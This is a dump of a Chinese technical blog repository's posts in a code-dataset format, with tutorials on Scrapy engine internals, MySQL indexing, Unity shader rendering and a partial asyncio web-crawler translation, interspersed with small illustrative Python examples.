@defer.inlineCallbacks\n def open_spider(self, spider, start_requests=(), close_if_idle=True):\n assert self.has_capacity(), \"No free spider slot when opening %r\" % \\\n spider.name\n logger.info(\"Spider opened\", extra={'spider': spider})\n nextcall = CallLaterOnce(self._next_request, spider)\n scheduler = self.scheduler_cls.from_crawler(self.crawler)\n start_requests = yield self.scraper.spidermw.process_start_requests(start_requests, spider)\n slot = Slot(start_requests, close_if_idle, nextcall, scheduler)\n self.slot = slot\n self.spider = spider\n yield scheduler.open(spider)\n yield self.scraper.open_spider(spider)\n self.crawler.stats.open_spider(spider)\n yield self.signals.send_catch_log_deferred(signals.spider_opened, spider=spider)\n slot.nextcall.schedule()\n 
slot.heartbeat.start(5)\n```\n这里创建调度器Scheduler,并调用Spider中间件管理器注册的中间件的process_start_requests对start_requests做相应处理。重点是nextcall,这个就是向上面主流程中的事件循环中注册事件的。从中可以看出把_next_request方法注册到时间循环,并且没5秒钟执行一次。并且这个nextcall也是可以主动调度的。\n\n接着分析engine._next_request()的实现:\n\n```\n\tdef _next_request_from_scheduler(self, spider):\n slot = self.slot\n request = slot.scheduler.next_request()\n if not request:\n return\n d = self._download(request, spider)\n d.addBoth(self._handle_downloader_output, request, spider)\n d.addErrback(lambda f: logger.info('Error while handling downloader output',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n d.addBoth(lambda _: slot.remove_request(request))\n d.addErrback(lambda f: logger.info('Error while removing request from slot',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n d.addBoth(lambda _: slot.nextcall.schedule())\n d.addErrback(lambda f: logger.info('Error while scheduling new request',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n return d\n```\n先从调度器中获取一个请求,执行下载,这中间要经过下载中间件层层过滤。接着注册回调函数_handle_downloader_output方法处理下载后的结果。\n看看_handle_downloader_output做了什么:\n```\n\tdef _handle_downloader_output(self, response, request, spider):\n assert isinstance(response, (Request, Response, Failure)), response\n if isinstance(response, Request):\n self.crawl(response, spider)\n return\n # response is a Response or Failure\n d = self.scraper.enqueue_scrape(response, request, spider)\n d.addErrback(lambda f: logger.error('Error while enqueuing downloader output',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n return d\n```\n如果返回结果是Request类型,需要重新调用crawl()方法,具体做法是,先交给调度器调度。如果返回类型是Response或者Failure,则交给scraper处理。接着看看enqueue_scrape()干了啥?\n```\n\tdef enqueue_scrape(self, response, request, spider):\n slot = self.slot\n dfd = slot.add_response_request(response, request)\n def finish_scraping(_):\n slot.finish_response(response, request)\n self._check_if_closing(spider, slot)\n self._scrape_next(spider, slot)\n return _\n dfd.addBoth(finish_scraping)\n dfd.addErrback(\n lambda f: logger.error('Scraper bug processing %(request)s',\n {'request': request},\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n self._scrape_next(spider, slot)\n return dfd\n```\n在scraper内部也会维护一个队列,其中add_response_request就是队列的producer,往队列里放任务,_scrape_next则是队列consumer,消费队列的任务。看看如何消费?\n```\n\tdef _scrape(self, response, request, spider):\n \"\"\"Handle the downloaded response or failure through the spider\n callback/errback\"\"\"\n assert isinstance(response, (Response, Failure))\n\n dfd = self._scrape2(response, request, spider) # returns spiders processed output\n dfd.addErrback(self.handle_spider_error, request, response, spider)\n dfd.addCallback(self.handle_spider_output, request, response, spider)\n return dfd\n\tdef _scrape2(self, request_result, request, spider):\n if not isinstance(request_result, Failure):\n return self.spidermw.scrape_response(\n self.call_spider, request_result, request, spider)\n else:\n # FIXME: don't ignore errors in spider middleware\n dfd = self.call_spider(request_result, request, spider)\n return dfd.addErrback(\n self._log_download_errors, request_result, request, spider)\n```\n如果是Response类型,在执行Spider中间件的scrape_response方法,并注册Spider结果处理函数handle_spider_output();看看handle_spider_output干了些什么?\n```\n\tdef handle_spider_output(self, result, request, response, spider):\n if not result:\n return defer_succeed(None)\n it = iter_errback(result, self.handle_spider_error, request, response, spider)\n dfd = 
parallel(it, self.concurrent_items,\n self._process_spidermw_output, request, response, spider)\n return dfd\n\tdef _process_spidermw_output(self, output, request, response, spider):\n if isinstance(output, Request):\n self.crawler.engine.crawl(request=output, spider=spider)\n elif isinstance(output, (BaseItem, dict)):\n self.slot.itemproc_size += 1\n dfd = self.itemproc.process_item(output, spider)\n dfd.addBoth(self._itemproc_finished, output, response, spider)\n return dfd\n elif output is None:\n pass\n else:\n typename = type(output).__name__\n logger.error('Spider must return Request, BaseItem, dict or None, '\n 'got %(typename)r in %(request)s',\n {'request': request, 'typename': typename},\n extra={'spider': spider})\n```\n首先在deffer中注册_process_spidermw_output方法,在_process_spidermw_output的处理中,如果接收到的结果是Request,就通知engine抓取此请求。如果接收到的是BaseItem或者dict类型的数据,则调用配置的itempipeline的process_item方法,这里往往是数据存DB或者写文件中,到此整理流程也就完成了。这只是正常流程的大概描述,中间还有很多异常处理和状态监控、log等等。"
},
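The `nextcall` mechanism described in the post above, a call that can be scheduled on demand and also fired on a heartbeat, is easy to model outside of Scrapy. The sketch below is a minimal re-implementation of the idea on top of Twisted's reactor; the class name `CallLaterOnce` matches Scrapy's helper, but this body is a simplified assumption, not the library's actual code.

```
from twisted.internet import reactor, task

class CallLaterOnce(object):
    """Run func on the next reactor tick, collapsing duplicate
    schedule() calls into a single invocation (simplified sketch)."""
    def __init__(self, func, *args, **kwargs):
        self._func, self._args, self._kwargs = func, args, kwargs
        self._call = None  # pending IDelayedCall, if any

    def schedule(self, delay=0):
        if self._call is None:  # ignore schedule() while one is pending
            self._call = reactor.callLater(delay, self)

    def __call__(self):
        self._call = None
        return self._func(*self._args, **self._kwargs)

def _next_request():
    print('checking the scheduler for the next request...')

nextcall = CallLaterOnce(_next_request)
nextcall.schedule()                      # on-demand tick, like the engine does
heartbeat = task.LoopingCall(nextcall.schedule)
heartbeat.start(5)                       # the 5-second heartbeat from open_spider()
reactor.callLater(12, reactor.stop)      # stop the demo loop after a few beats
reactor.run()
```

Collapsing duplicate `schedule()` calls is the design point: no matter how many deferreds fire in one tick, `_next_request` runs once per loop iteration.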
{
"alpha_fraction": 0.6354044675827026,
"alphanum_fraction": 0.6752637624740601,
"avg_line_length": 18.409090042114258,
"blob_id": "dd2fe29ec0f2b88cc05e34359501881758d4ed81",
"content_id": "749b128d711f77165a0d8db6b76d4f8d13d56d7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1785,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 44,
"path": "/source/_posts/MySql索引.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: MySql索引\ndate: 2018-01-23 18:01:52\ncategories: MySQL\ntags: [MySQL,B-Tree]\n---\n## MySql索引分类:\n### 1)B-Tree\n** 缺点: **\n 1. 只能索引列最左边开始\n 2. 不能跳过索引中的列\n 3. 不能优化访问任何在第一个范围条件右边的列\n\n### 2)哈希索引\n只对精确查找有用\n** 缺点: **\n 1. 不能进行排序\n 2. 不支持部分键匹配\n 3. 只支持=, in(), <=>相等比较\n \n### 3)空间数据索引(R-Tree)\n和B-Tree不同,这类索引无须前缀查询。空间索引会从所有维度来索引数据。查询时,可以任意维度组合查询。\n\n## 索引优点\n 1. 减少服务器需要扫描的数据量\n 2. 帮助服务器避免排序和临时表\n 3. 将随机I/O变为顺序I/O\n\n## 使用索引策略\n 1. 独立列\n a. 不能是表达式的一部分,也不能是函数的参数\n 2. 保证较高的前缀索引选择性\n 3. 多列索引\n a. 在多个列上创建独立的单列索引大部分情况下并不能提高MySql的查询性能\n b. 但在MySql5.0和更高版本的MySql中可以使用“索引合并”策略优化查询,使其使用单列索引;但也说明这是一个糟糕的索引设计;\n 4. 选择合适的索引列顺序\n a. 不考虑排序和分组时将选择性高的列放到索引的最前列\n 5. 聚簇索引\n a. InnoDB中支持主键聚集数据,也就是被索引的类就是主键列;\n b. 如果没有定义主键,InnoDB选择一个唯一非空索引代替。\n c. 最好避免随机主键聚簇索引,自增主键索引最好;\n d. 顺序主键在高并发的情况下会有热点问题;\n 6. 覆盖索引\n a. 索引中包含所有需要查询的字段,就不需要读取数据行,称为覆盖索引"
},
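The leftmost-prefix and covering-index rules above are easy to observe in practice. The sketch below uses Python's built-in sqlite3 rather than MySQL (its B-Tree indexes follow the same leftmost-prefix logic), so treat it as an illustration, not MySQL-specific behavior; the table and column names are invented for the demo.

```
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute('CREATE TABLE users (last_name TEXT, first_name TEXT, age INT)')
conn.execute('CREATE INDEX idx_name ON users (last_name, first_name)')

def plan(sql):
    # EXPLAIN QUERY PLAN reports whether an index (or covering index) is used
    for row in conn.execute('EXPLAIN QUERY PLAN ' + sql):
        print(row[-1])

plan("SELECT * FROM users WHERE last_name = 'Smith'")   # leftmost prefix: uses idx_name
plan("SELECT * FROM users WHERE first_name = 'Ann'")    # prefix skipped: full table scan
plan("SELECT last_name, first_name FROM users "
     "WHERE last_name = 'Smith'")                       # index alone answers it: covering
```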
{
"alpha_fraction": 0.662372350692749,
"alphanum_fraction": 0.6816967725753784,
"avg_line_length": 19.082019805908203,
"blob_id": "0e98d25a353f8a32f87cfdab4ffd3c7f70d29aa5",
"content_id": "c654ad7818202a7c426c0288ec961924ee3ed591",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11849,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 317,
"path": "/source/_posts/shader.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Shader渲染流水线\ndate: 2017-03-29 14:43:43\ncategories: Unity #文章文类\ntags: [unity,shader,渲染流水线,光照模型]\n---\n\nGPU流水线上可高度编程的阶段,包括表面着色器、顶点片元着色器、固定管线着色器。目前的Unity5中,本质上只有顶点片元着色器\n\n#### 关于渲染流水线:\n\n主要任务:从一个三维场景,渲染出一张二维图像,主要由CPU & GPU协作完成。\n渲染流程三个阶段:应用阶段 | 几何阶段 | 光栅化阶段\n\n\n\n* 应用阶段:根据三维场景输出渲染所需要的几何信息(图元:点、线、三角面等)\n\n \t三个步骤:\n\n 1)数据加载到显存。\n\n 2)设置渲染状态(使用哪个着色函数、光源属性等)。\n\n 3)调用Draw Call(CPU向GPU发起渲染指令)\n\n* 几何阶段:主要任务是把几何顶点坐标转换到屏幕空间中,然后交个光栅器处理\n\n* 光栅化阶段:使用上阶段的数据产生屏幕像素,渲染成像。\n\n两个主要任务:\n\n* 计算每个图元覆盖了哪些像素\n\n* 计算这些像素颜色\n\n#### Draw Call(GPU流水线):【几何阶段 & 光栅化阶段】\n\n\n* 顶点着色器:主要实现顶点空间变换(坐标变换)、可实现定点着色(光照计算)等,基本任务把顶点位置坐标从模型空间转换到裁剪空间\n\n* 曲面细分着色器:可选,细分图元,需要显卡支持。使模型看起来更细腻\n\n* 裁剪:不在摄像机视野内的物体在此阶段被裁剪掉\n\n* 屏幕映射:坐标转换(三维->二维),但需要记录下坐标深度、法线方向、视角方向等,跟用于显示的屏幕分辨率有关。\n\n* 三角形设置:计算三角网格表示数据的过程,为计算三角面覆盖的像素准备数据\n\n* 三角形遍历:检查每个像素是否被一个三角网格覆盖并生成图元。输出片元序列\n\n* 片元着色器:输入,顶点着色器输出数据的插值。输出,一个或多个颜色值。纹理采样\n\n* 逐片元操作:片元-->模板测试-->深度测试-->混合-->颜色缓冲\n\n```\nOpenGL & DirectX :图像应用编程接口,用于渲染二维、三维图像。位于上层应用和GPU之间,应用程序通过这些编程接口发送渲染指令,由图像应用编程接口向显卡发送渲染指令\n```\n\n\n** 着色器语言:**\n\n1)Direct X的HLSL(High Level Shading Language)\n\n2)OpenGL的GLSL\n\n3)NVIDIA的CG\n\n4)Unity使用的是ShaderLab\n\n#### 重要的数学基础:\n\n** 1)矢量点积 **\n\n 几何意义:投影\n\n\n\na \\* b = |a| \\* |b| \\* cosQ ** b在a上的投影 ** \n\n2)矢量叉积\n\n几何意义:a X b得到同时垂直于a&b的新矢量\n\n用途:计算垂直于一个平面、三角形的矢量。判断三角面的朝向\n\n3)矩阵\n\n几何意义:坐标变换(平移、缩放、旋转等,分别对应一变换矩阵)\n\n用途:坐标空间变换\n\n4)坐标空间\n\n\n\n\n### ShaderLab语法\n基本结构:\n\n```\nShader \"Custom Shaders/Simple Shader\" {\n Properties {\n // 声明一个材质面板上的颜色拾取器\n\t_Color (\"Color Tint\", Color) = (1, 1, 1, 1)\n }\n SubShader {\n Pass {\n // CG代码开始\n CGPROGRAM\n // 声明顶点着色函数\n #pragma vertex vert\n // 声明片元着色函数\n #pragma fragment frag\n // 在CG程序中需要声明一个属性名称和类型都匹配的变量\n uniform fixed4 _Color;\n\t struct a2v {\n // POSITION语义告诉Unity,用模型的顶点坐标填充vertex参数\n float4 vertex : POSITION;\n // NORMAL语义告诉Unity,用模型空间的法线方向填充normal参数\n\t\tfloat3 normal : NORMAL;\n // TEXCOORD0语义,告诉unity,用模型的第一套纹理坐标填充texcoord参数\n\t\tfloat4 texcoord : TEXCOORD0;\n };\n \n // 使用v2f结构体定义顶点着色器的输出\n struct v2f {\n // SV_POSITION语义告诉Unity,pos里包含了顶点在裁剪空间中的位置\n float4 pos : SV_POSITION;\n // COLOR0语义,用于存储颜色信息\n fixed3 color : COLOR0;\n };\n \n v2f vert(a2v v) {\n // 声明输出结构\n \tv2f o;\n \to.pos = mul(UNITY_MATRIX_MVP, v.vertex);\n // v.normal保存了顶点的法线方向,分量范围[-1.0, 1.0],先将其映射到[0.0, 1.0],存到o.color传递给片元着色器\n \to.color = v.normal * 0.5 + fixed3(0.5, 0.5, 0.5);\n return o;\n }\n fixed4 frag(v2f i) : SV_Target {// SV_Target告诉渲染器,把用户的输出颜色存储到一个渲染目标中\n \tfixed3 c = i.color;\n \tc *= _Color.rgb;\n // 将插值后的值显示到屏幕上\n return fixed4(c, 1.0);\n }\n ENDCG\n }\n }\n FallBack \"Diffuse\"\n}\n```\n\nCG中的语义:\n\n\n\n\n\n### 基本光照&光照模型:\n* 环境光:通常是一个全局变量\n\n* 自发光:\n\n* 漫反射(兰伯特光照模型):\n\n* 高光(镜面)反射(Phong光照模型):\n### 光照模型:\n* Lambert模型:用来描述漫反射\n```\n计算公式:Cdiffuse = (Clight * Mdiffuse ) Max(0, n * I)\n\nn:表面法线;I:指向光源的单位矢量;Mdiffuse:材质的漫反射颜色;Clight:光源颜色\n```\n\n* Phong模型:模拟高光,可让物体表现出光斑\n计算公式:\n```\nmgloss:是材质光泽度,mspecular:材质的高光反射颜色,Clight:光源颜色,v:视角方向,r:反射方向\n```\n\n* Blinn-Phong模型:基本原理同Phone,提高了运算效率;目前游戏上较流行的模型\n\n* PBR:基于物理的渲染;使用BRDF(双向反射率分布方程):主要描述了光线作用到物体表面后的反射(高光反射Specular)和散射(漫反射Diffuse)\n\n### 光照计算:\n* 1)逐像素光照:\n\n 以每个像素为基础,得到他们的法线(对顶点法线插值得到,或从法线纹理采样得到),然后进行光照计算。\n\n* 2)逐顶点光照\n\n 在每个顶点上计算光照,然后在渲染图元内部进行线型插值,最后输出成像素颜色。\n\n 由于顶点数目往往小于像素数目,所以逐顶点光照计算量少些\n\n### 纹理:\n* 漫反射纹理(漫反射贴图)\n\n* 凹凸纹理(法线贴图、Heightmap)\n\n* 渐变纹理\n\n### 透明效果:\n两种实现方式:1)透明度测试 2)透明度混合\n\n* 透明度测试:不能实现真正的半透明,不需要关闭深度写入,实际上是根据透明度舍弃一些图元,所以他实现的效果要么完全透明,要么不透明。\n\n* 透明度混合:可以实现真正的半透明,使用当前片元的透明度作为混合因子,与颜色缓存区中的颜色进行混合,得到新的颜色存入颜色缓存区中。需要关闭深度写入,深度缓存是只读的。\n\n* 
透明度混合方式关闭深度写入的原因:深度缓存区的剔除机制。\n\n### 渲染顺序问题:\n从距离摄像机由远及近依次渲染。\n\n不考虑透明物体的情况下,unity使用深度缓冲区(z-buffer)的方式,使我们不用关心场景中物体的渲染顺序。\n\nz-buffer基本思想:根据深度缓冲中的值判断该图片距离摄像机的距离,当渲染一个图元时,需要把他的深度值跟已经存到z-buffer中的值比较,如果距离摄像机更近,则这个片元覆盖掉z-buffer中的值,深度值写入z-buffer中。\n\n### Unity Shader的渲染顺序:\n\n采用渲染队列的方式解决:\n\n\n```\n// 透明度测试\nSubShader {\n\tTags {\"Queue\": \"AlphaTest\"}\n\tPass {\n\t\t...\n\t}\n}\n// 透明度混合\nSubShader {\n\tTags {\"Queue\": \"Transparent\"}\n\tPass {\n\t\tZWrite Off\n\t\t...\n\t}\n}\n```\n\n### Unity 渲染路径\n\n\n### Unity Standard Sharder\n\n\n** 1、Rendering Mode ** \n\nRendering Mode:在非透明和多种透明效果之间切换。\n\nOpaque:默认,实体渲染。\n\nCutout:Alpha test,通过贴图的Alpha值缕空模型表面。\n\nTransparent:透明效果,如玻璃,半透明塑料等等。\n\nFade:在这个模式下,一个对象可以实现淡入淡出效果。\n\n参考:https://docs.unity3d.com/Manual/StandardShaderMaterialParameterRenderingMode.html\n\n** 2、Albedo ** \n\nAlbedo是一个只拥有颜色信息的“平面”贴图,即不带任何AO,SHADOW等光影信息。是物体的Base Color颜色值。\n\n** 3、Metallic & Specluar & Smoothness ** \n\nSpecular通过直接赋与颜色的方式来决定高光反射强度。Metallic则通过一个0~1的值,来决定金属的反射强度。\n\n不管是在metallic还是Specular模式下,一但使用了贴图来决定高光反射效果。引擎将会采用贴图中的值,设置的Metallic因子,或者Specular Color均会无效。\n\nSmoothness则决定了一个物体的光滑呈度。 即使一个物体表面高光很强烈。若它是一个不光滑的物体,那么其反射会呈不规则的方向分布,光会分散到不同的地方。那么到达人眼中的反射光就会少。整体的反射效果就会变得很弱。(注:当Metallic或者Specular被赋与贴图后。Smoothness值会失效。 转而采用Matallic或者Specular贴中的Alpha通道作为Smoothness值。)\n\n\n** 4、Normal Map ** \n\nNormal Map是Bump Mapping的一种特例化。 它主要是通过贴图为光照计算时提供更细节的法线信息。使物体表面具有高度的细节效果。如下图所示\n\n\n** 5、Heightmap ** \n\nHeightmap比NormalMap更上一层楼,NormalMap是通过赋与物体表面更多的法线信息,来造成光照上的细节增强。 Normal Map有一个缺点就是,当视线与表面平行时,就失去法线效果。而Heightmap则直接对某些顶点进行位移。由此也可以看出来,Heightmap的效率开销会比Normalmap高,要更据情况选择使用。\n\n高度图是一张灰度图,白色表示突出,黑色表示凹陷。\n\n\n** 6、Occlusion Map **\n\nOcclusion Map用于决定一个模型各部位受到间隔光照的影响情况。 间隔光照一般来自于Ambient和环境反射。\n\n\n** 7、Emission **\n\nEmission表示一个物体的自发光程度。默认是纯黑,如果为这个物体赋值了非黑色的材质。 那么这个物体即使在黑暗的场景下,也会有亮光。\n\n** 8、Detail Mask & Secondary Maps **\n\nSecondary Maps用于在物体的表面增加细节。我们可以为一个物体再赋值一套Albedo和NormalMap. 第一套Albedo和第二套Albedo是叠加的。\n\n\n参考:https://docs.unity3d.com/Manual/StandardShaderMaterialParameterDetail.html\n\n** 9、Fresnel **\n\nFresnel菲涅尔效果。物体的表面与视线的夹角的不同,会导致眼睛看到的从物体反射出来的光线的反射量不同。\n\nStandard Shader通过Smoothness间接控制菲涅尔反射效果\n\n参考:http://docs.unity3d.com/Manual/StandardShaderFresnel.html\n\nPBR官方参考使用样例:\n\nhttps://blogs.unity3d.com/2015/02/18/working-with-physically-based-shading-a-practical-approach/\n\n"
},
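The Lambert and Blinn-Phong formulas quoted in the shader post above can be evaluated directly. The snippet below is a small NumPy sketch of both lighting models for a single surface point; the vectors and colors are arbitrary example values, not taken from the post.

```
import numpy as np

def normalize(v):
    return v / np.linalg.norm(v)

def lambert(c_light, m_diffuse, n, l):
    # Cdiffuse = Clight * Mdiffuse * max(0, n . l)
    return c_light * m_diffuse * max(0.0, float(np.dot(n, l)))

def blinn_phong(c_light, m_specular, n, v, l, gloss):
    # specular = Clight * Mspecular * max(0, n . h)^gloss, with h the half vector
    h = normalize(v + l)
    return c_light * m_specular * max(0.0, float(np.dot(n, h))) ** gloss

n = normalize(np.array([0.0, 1.0, 0.0]))   # surface normal
l = normalize(np.array([1.0, 1.0, 0.0]))   # direction to the light
v = normalize(np.array([0.0, 1.0, 1.0]))   # direction to the viewer
c_light = np.array([1.0, 1.0, 1.0])
print('diffuse :', lambert(c_light, np.array([0.8, 0.2, 0.2]), n, l))
print('specular:', blinn_phong(c_light, np.array([1.0, 1.0, 1.0]), n, v, l, 32))
```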
{
"alpha_fraction": 0.7286129593849182,
"alphanum_fraction": 0.7391585111618042,
"avg_line_length": 31.83745574951172,
"blob_id": "7e5dab5898984b321d300ea2c098d6447a463d36",
"content_id": "704116f55a9cdcc0d505f7fe729bef1a111ff104",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 16561,
"license_type": "no_license",
"max_line_length": 238,
"num_lines": 283,
"path": "/source/_posts/500-async-crawler.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 500-async-crawler\ndate: 2018-12-13 20:17:05\ncategories: 500 Lines or Less\ntags: [asyncio,python,crawler]\n---\n\n# 原文&作者:\n\n[A Web Crawler With asyncio Coroutines](http://aosabook.org/en/500L/a-web-crawler-with-asyncio-coroutines.html)\n\n- A. Jesse Jiryu Davis\n\n> A. Jesse Jiryu Davis是纽约MongoDB的高级工程师,负责MongoDB的异步Python驱动,也是MongoDB C驱动的主程,同时也是PyMongo团队的一员。并且在 asyncio和Tornado上都所有贡献。他的个人博客地址是:http://emptysqua.re\n\n\n- Guido van Rossum\n\n> Guido van Rossum是Python之父,Python社区称他为BDFL,博客地址:http://www.python.org/~guido/\n\n# 简介\n传统的计算机科学,强调高效算法、整个计算越快越好。但很多网络程序耗时并不在计算上,而是保持很多慢连接,或者很少的事件上。这些程序面临一个完全不一样的挑战:需要等待大量的有效网络事件。当前解决的方法是使用异步IO\n\n本章介绍一个简单的网络爬虫,这是一个原生的异步应用程序,因为它等待很多网络请求返回,但计算量很少。每次请求的网页数越多,完成的越快。如果每个请求一个线程,随着并发请求的增加,将会耗尽内存或者跟线程相关的资源。使用异步I/O可以避免线程的弊端。\n\n我们将分三个阶段来完成这个爬虫。首先,我们简单介绍下异步事件循环,使用事件循环和回调来实现一个简单的爬虫。这种方式非常高效,但扩展到较复杂的问题上将陷入回调陷阱。接下来,我们介绍高效并且可扩展的Python协程,我们使用生成器来实现简单的协程。最后,我们将使用Python标准库asyncio,并配合异步队列来实现爬虫\n\n# 任务\n\n网络爬虫在网络上寻找并下载网页,之后归档或者索引下载下来的网页。从一个根url开始,下载、解析网页中的链接地址,未抓取过的添加到队列继续抓取,直到抓取的网页上的链接地址都抓取过了,并且队列为空爬虫停止。\n\n我们可以同时下载多个网页来加速爬虫。当爬虫获取到新的链接时,在独立的socket上触发相同的抓取操作,解析相应,并将新的链接地址放入队列中。但可能会因为并发太多而造成性能下降,所以,我们需要限制并发请求数。\n\n# 传统的方法\n\n怎样让爬虫并发起来呢?传统的方式是使用线程池。每个线程每次负责下载一个网页。例如下面的程序,从xkcd.com下载网页:\n```\ndef fetch(url):\n sock = socket.socket()\n sock.connect(('xkcd.com', 80))\n request = 'GET {} HTTP/1.0\\r\\nHost: xkcd.com\\r\\n\\r\\n'.format(url)\n sock.send(request.encode('ascii'))\n response = b''\n chunk = sock.recv(4096)\n while chunk:\n response += chunk\n chunk = sock.recv(4096)\n\n # Page is now downloaded.\n links = parse_links(response)\n q.add(links)\n```\nsocket默认是阻塞的(当线程调用connect、recv等方法,程序将等待方法返回)。所以要同时下载多个网页,需要多线程。复杂的应用程序将使用线程池来减少线程频繁创建的开销,重复利用空闲的线程。在socket上的连接池也是同样的道理。\n\n并且,线程开销比较大,操作系统对用户或者机器的线程数是有明确限制的。Jesse的操作系统,Python线程占用50k内存,如果开启成千上万的线程将使系统崩溃。如果我们同时启动成千上万的下载操作在socket上,结果是在socket耗尽之前,线程所占资源将首先到达瓶颈。\n\n著名的 \"C10K问题\",Dan Kegel 列出了多线程并发的限制。他这样说:\n>\n> It's time for web servers to handle ten thousand clients simultaneously, don't you think? 
After all, the web is a big place now.\n\nKegel在1999年提出“C10K”,现在看来并发1万不是什么特别困难的问题,但是这个问题仅仅在并发数量上改变了,本质上来说,没有改变。在当时,一个线程处理处理一个连接解决1万并发是不切实际的。现在应该解决并发数量上高一个量级了。的确,我们的网络爬虫可以使用线程实现。但是,大规模的应用,成千上万的并发连接,c10k问题还是存在的,即使socket没有超过大多数操作系统限制,线程也耗尽了。怎么解决这个问题呢?\n\n# 异步\n异步I/O使用非阻塞的套接字,在单线程下实现并发操作。我们的异步爬虫,我们将使用非阻塞套接字:\n```\nsock = socket.socket()\nsock.setblocking(False)\ntry:\n sock.connect(('xkcd.com', 80))\nexcept BlockingIOError:\n pass\n```\n不幸的是,非阻塞套接字即使运行正常,也在connect上抛出了异常。这个异常重复底层C函数令人厌恶的行为,它通过将errno设置为EINPROGRESS来告诉你开始运行。\n\n现在,我们需要知道连接什么时候建立成功了,接着可以发送HTTP请求。我们可以简单的通过循环来探测是否建立了连接。\n\n```\nrequest = 'GET {} HTTP/1.0\\r\\nHost: xkcd.com\\r\\n\\r\\n'.format(url)\nencoded = request.encode('ascii')\n\nwhile True:\n try:\n sock.send(encoded)\n break # Done.\n except OSError as e:\n pass\n\nprint('sent')\n```\n这种方式不仅浪费CPU资源,而且不能有效的获取多个套接字上的事件。老的BSD Unix操作系统是通过select系统调用来解决这个问题的。他是一个在非阻塞套接字上等待事件的C函数。如今,在大量并发量级的网络应用驱使下,使用poll代替select,接着,BSD操作系统下的kqueue和Linux操作系统下的epoll也相继出现。他们都跟select相似,但在高并发的情况下,性能较好。\n\nPython3.4中的DefaultSelector会根据操作系统选择性能最好的select函数(select、poll或者epoll,kqueue)。为了注册网络I/O事件通知,我们创建了一个非阻塞的套接字并使用默认selector注册。\n\n```\nfrom selectors import DefaultSelector, EVENT_WRITE\n\nselector = DefaultSelector()\n\nsock = socket.socket()\nsock.setblocking(False)\ntry:\n sock.connect(('xkcd.com', 80))\nexcept BlockingIOError:\n pass\n\ndef connected():\n selector.unregister(sock.fileno())\n print('connected!')\n\nselector.register(sock.fileno(), EVENT_WRITE, connected)\n```\n\n我们忽略错误信息,并且调用selector.register,传入套接字文件描述符和事件类型常量。当连接建立了我们会收到通知,参数EVENT_WRITE:代表我们想知道什么套接字可写。方法参数connected是注册的回调函数,当事件发生时会执行。\n\n我们在一个循环中处理selector获取到的I/O事件通知:\n```\ndef loop():\n while True:\n events = selector.select()\n for event_key, event_mask in events:\n callback = event_key.data\n callback()\n```\nconnected回调函数保存在event_key.data中,当我们收到非阻塞套接字连接建立之后立即执行connected回调函数。\n\n不同于前面的循环,select系统调用会阻塞,等待I/O事件发生。事件循环接着执行通知事件的回调函数。没有完成的事件将保持挂起,等待下一次事件循环执行。\n\n我们已经介绍了哪些内容?我们介绍了怎么开始一个操作,并且在事件准备好后,并且执行其回调函数;我们也介绍了一个异步框架,使用非阻塞套接字和事件循环,在单线程中执行并发操作。\n\n我们已经实现了“并发”,但不是传统意义上的“并行”。也就是说,我们构建了一个可以执行并发I/O的小系统,他可以在其他I/O操作正在执行时,启动新的操作。实际上,他不能利用多核进行并行计算。但是,这个系统是为I/O密集型问题设计的,而不是CPU密集型问题设计的。\n\n所以,我们的事件循环在并发I/O问题上是高效的,因为它不需要为每个连接浪费线程资源。但是,在我们继续之前,纠正一个误解:异步比多线程快。的确,通常在Python中,像我们这样的事件循环在处理少量活动连接的情况下,异步是比多线程稍微慢些,并且,运行时没有GIL的情况下,同样的负载下多线程可能更快。异步适用于事件很少,并有大量慢连接或不活跃连接的应用\n\n# 回调编程\n怎么使用我们构建的简洁的框架来实现网络爬虫呢?即使仅仅一个简单的url请求获取,实现起来都很痛苦。\n\n从设置全局变量urls_todo,和seen_urls开始:\n```\nurls_todo = set(['/'])\nseen_urls = set(['/'])\n```\n其中,seen_urls包括urls_todo和已经完成的url。这两个变量被初始化成根URL('/')。\n请求一个网页需要一系列的回调。当套接字connected的时候会触发connected回调,并发送get请求到服务端。但是,当需要等待一个返回时,需要注册另一个回调。如果这个回调触发了,才能读取全部的返回结果,这样循环往复的注册回调。\n\n我们把这些回调设计到一个Fetcher对象中。他需要一个URL,一个套接字对象和一个变量来存放返回结果。\n```\nclass Fetcher:\n def __init__(self, url):\n self.response = b'' # Empty array of bytes.\n self.url = url\n self.sock = None\n```\n我们调用的是Fetcher.fetch函数\n```\n# Method on Fetcher class.\n def fetch(self):\n self.sock = socket.socket()\n self.sock.setblocking(False)\n try:\n self.sock.connect(('xkcd.com', 80))\n except BlockingIOError:\n pass\n\n # Register next callback.\n selector.register(self.sock.fileno(),\n EVENT_WRITE,\n self.connected)\n \n```\nfetch函数首先建立一个socket连接,并声明为非阻塞,通知套接字方法在连接建立之前立刻返回,将控制流程交给事件循环等待连接。下面解析下为什么。假设我们按下面的结构构件应用程序:\n```\n# Begin fetching http://xkcd.com/353/\nfetcher = Fetcher('/353/')\nfetcher.fetch()\n\nwhile True:\n events = selector.select()\n for event_key, event_mask in events:\n callback = event_key.data\n callback(event_key, 
